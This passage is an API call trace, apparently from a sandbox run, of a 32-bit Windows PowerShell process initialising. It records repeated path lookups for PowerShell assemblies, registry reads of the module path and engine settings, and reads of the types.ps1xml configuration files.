lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.057] GetLastError () returned 0x7a [0089.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e374, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.057] GetLastError () returned 0x7a [0089.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e3d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.057] GetLastError () returned 0x7a [0089.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.057] GetLastError () returned 0x7a [0089.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.057] GetLastError () returned 0x7a [0089.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x13e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0089.057] GetLastError () returned 0x7a [0089.080] SetConsoleCtrlHandler (HandlerRoutine=0x2af384a, Add=1) returned 1 [0089.080] GetLastError () returned 0x7a [0089.091] CoCreateGuid (in: pguid=0x13e8b8 | out: pguid=0x13e8b8*(Data1=0x77160089, Data2=0x4cd2, Data3=0x4173, Data4=([0]=0xac, [1]=0x32, [2]=0xdf, [3]=0x14, [4]=0x19, [5]=0x57, [6]=0x66, [7]=0x2b))) returned 0x0 [0089.109] WinSqmIsOptedIn () returned 0x0 [0089.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.109] GetLastError () returned 0xcb [0089.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.111] GetLastError () returned 0xcb [0089.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.111] GetLastError () returned 0xcb [0089.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.112] GetLastError () returned 0xcb [0089.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.112] GetLastError () returned 0xcb [0089.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.131] GetLastError () returned 0xcb [0089.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.132] GetLastError () returned 0xcb [0089.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0089.132] GetLastError () returned 0xcb [0089.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.373] GetLastError () returned 0xcb [0089.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.373] GetLastError () returned 0xcb [0089.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.373] GetLastError () returned 0xcb [0089.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.373] GetLastError () returned 0xcb [0089.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.399] GetLastError () returned 0x3 [0089.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.399] GetLastError () returned 0x3 [0089.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.399] GetLastError () returned 0x3 [0089.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.399] GetLastError () returned 0x3 [0089.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.400] GetLastError () returned 0x3 [0089.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.400] GetLastError () returned 0x3 [0089.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.400] GetLastError () returned 0x3 [0089.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.400] GetLastError () returned 0x3 [0089.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.400] GetLastError () returned 0x3 [0089.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.400] GetLastError () returned 0x3 [0089.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.400] GetLastError () returned 0x3 [0089.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0089.400] GetLastError () returned 0x3 [0089.402] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0089.402] GetLastError () returned 0x3 [0089.403] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3953b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0089.403] GetLastError () returned 0x3 [0089.403] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e6d0 | out: phkResult=0x13e6d0*=0x34c) returned 0x0 [0089.404] RegQueryValueExW (in: hKey=0x34c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x13e714, lpData=0x0, lpcbData=0x13e710*=0x0 | out: lpType=0x13e714*=0x2, lpData=0x0, lpcbData=0x13e710*=0x6c) returned 0x0 [0089.404] RegQueryValueExW (in: hKey=0x34c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x13e714, lpData=0x3953b0, lpcbData=0x13e710*=0x6c | out: lpType=0x13e714*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x13e710*=0x6c) returned 0x0 [0089.404] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3953b0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0089.404] GetLastError () returned 0x3 [0089.404] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3953b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0089.404] GetLastError () returned 0x3 [0089.405] RegCloseKey (hKey=0x34c) returned 0x0 [0089.405] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3953b0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0089.405] GetLastError () returned 0x3 [0089.405] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e6d0 | out: phkResult=0x13e6d0*=0x34c) returned 0x0 [0089.405] RegQueryValueExW (in: hKey=0x34c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x13e714, lpData=0x0, lpcbData=0x13e710*=0x0 | out: lpType=0x13e714*=0x0, lpData=0x0, lpcbData=0x13e710*=0x0) returned 0x2 [0089.405] RegCloseKey (hKey=0x34c) returned 0x0 [0089.439] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3953b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0089.440] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x13e238, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0089.440] GetLastError () returned 0x3f0 [0089.440] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0089.441] GetLastError () returned 0x3f0 [0089.449] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e650 | out: phkResult=0x13e650*=0x354) returned 0x0 [0089.450] RegQueryValueExW (in: hKey=0x354, lpValueName="path", lpReserved=0x0, lpType=0x13e6b8, lpData=0x0, lpcbData=0x13e6b4*=0x0 | out: lpType=0x13e6b8*=0x1, lpData=0x0, lpcbData=0x13e6b4*=0x74) returned 0x0 [0089.450] RegQueryValueExW (in: hKey=0x354, lpValueName="path", lpReserved=0x0, lpType=0x13e698, lpData=0x0, lpcbData=0x13e694*=0x0 | out: lpType=0x13e698*=0x1, lpData=0x0, lpcbData=0x13e694*=0x74) returned 0x0 [0089.450] RegQueryValueExW (in: hKey=0x354, lpValueName="path", lpReserved=0x0, lpType=0x13e698, lpData=0x3953b0, lpcbData=0x13e694*=0x74 | out: lpType=0x13e698*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x13e694*=0x74) returned 0x0 [0089.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x13e218, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0089.450] GetLastError () returned 0xcb [0089.450] SetErrorMode (uMode=0x1) returned 0x1 [0089.450] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x13e698 | out: lpFileInformation=0x13e698*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0089.450] GetLastError () returned 0xcb [0089.450] SetErrorMode (uMode=0x1) returned 0x1 [0089.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e20c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0089.451] GetLastError () returned 0xcb [0089.451] SetErrorMode (uMode=0x1) returned 0x1 [0089.451] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e68c | out: lpFileInformation=0x13e68c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0089.451] GetLastError () returned 0xcb [0089.451] SetErrorMode (uMode=0x1) returned 0x1 [0089.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e20c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0089.451] GetLastError () returned 0xcb [0089.451] SetErrorMode (uMode=0x1) returned 0x1 [0089.451] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e68c | out: lpFileInformation=0x13e68c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0089.452] GetLastError () returned 0xcb [0089.452] SetErrorMode (uMode=0x1) returned 0x1 [0089.455] GetACP () returned 0x4e4 [0089.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e09c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0089.468] GetLastError () returned 0x0 [0089.468] SetErrorMode (uMode=0x1) returned 0x1 [0089.469] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358 [0089.469] GetLastError () returned 0x0 [0089.469] GetFileType (hFile=0x358) returned 0x1 [0089.470] SetErrorMode (uMode=0x1) returned 0x1 [0089.470] GetFileType (hFile=0x358) returned 0x1 [0089.470] ReadFile (in: hFile=0x358, lpBuffer=0x2cab39c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cab39c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.471] GetLastError () returned 0x0 [0089.472] ReadFile (in: hFile=0x358, lpBuffer=0x2cab39c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cab39c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.472] GetLastError () returned 0x0 [0089.472] ReadFile (in: hFile=0x358, lpBuffer=0x2cab39c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cab39c*, lpNumberOfBytesRead=0x13e604*=0x1000, lpOverlapped=0x0) returned 1 [0089.472] GetLastError () returned 0x0 [0089.473] ReadFile (in: hFile=0x358, lpBuffer=0x2cab39c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cab39c*, lpNumberOfBytesRead=0x13e604*=0xcf3, lpOverlapped=0x0) returned 1 [0089.473] GetLastError () returned 0x0 [0089.473] ReadFile (in: hFile=0x358, lpBuffer=0x2caa82f, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2caa82f*, lpNumberOfBytesRead=0x13e604*=0x0, lpOverlapped=0x0) returned 1 [0089.473] GetLastError () returned 0x0 [0089.473] ReadFile (in: hFile=0x358, lpBuffer=0x2cab39c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x13e604, lpOverlapped=0x0 | out: lpBuffer=0x2cab39c*, lpNumberOfBytesRead=0x13e604*=0x0, lpOverlapped=0x0) returned 1 [0089.473] GetLastError () returned 0x0 [0089.473] CloseHandle (hObject=0x358) returned 1 [0089.473] GetLastError () returned 0x0 [0089.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e164, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0089.474] GetLastError () returned 0x0 [0089.474] SetErrorMode (uMode=0x1) returned 0x1 [0089.474] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2cbc710 | out: lpFileInformation=0x2cbc710*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0089.474] GetLastError () returned 0x0 [0089.474] SetErrorMode (uMode=0x1) returned 0x1 [0089.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0089.475] GetLastError () returned 0x0 [0089.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e588 | out: phkResult=0x13e588*=0x358) returned 0x0 [0089.475] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e5d0, lpData=0x0, lpcbData=0x13e5cc*=0x0 | out: lpType=0x13e5d0*=0x1, lpData=0x0, lpcbData=0x13e5cc*=0x56) returned 0x0 [0089.475] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e5d0, lpData=0x3953b0, lpcbData=0x13e5cc*=0x56 | out: lpType=0x13e5d0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e5cc*=0x56) returned 0x0 [0089.475] RegCloseKey (hKey=0x358) returned 0x0 [0089.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0089.475] GetLastError () returned 0x0 [0089.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e0c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0089.475] GetLastError () returned 0x0 [0089.499] GetSystemInfo (in: lpSystemInfo=0x13dd08 | out: lpSystemInfo=0x13dd08*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.499] VirtualQuery (in: lpAddress=0x13d4c4, lpBuffer=0x13e4c4, dwLength=0x1c | out: lpBuffer=0x13e4c4*(BaseAddress=0x13d000, AllocationBase=0x100000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0089.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x13e09c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0089.505] GetLastError () returned 0x0 [0089.505] SetErrorMode (uMode=0x1) returned 0x1 [0089.505] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x358 [0089.505] GetLastError () returned 0x0 [0089.505] 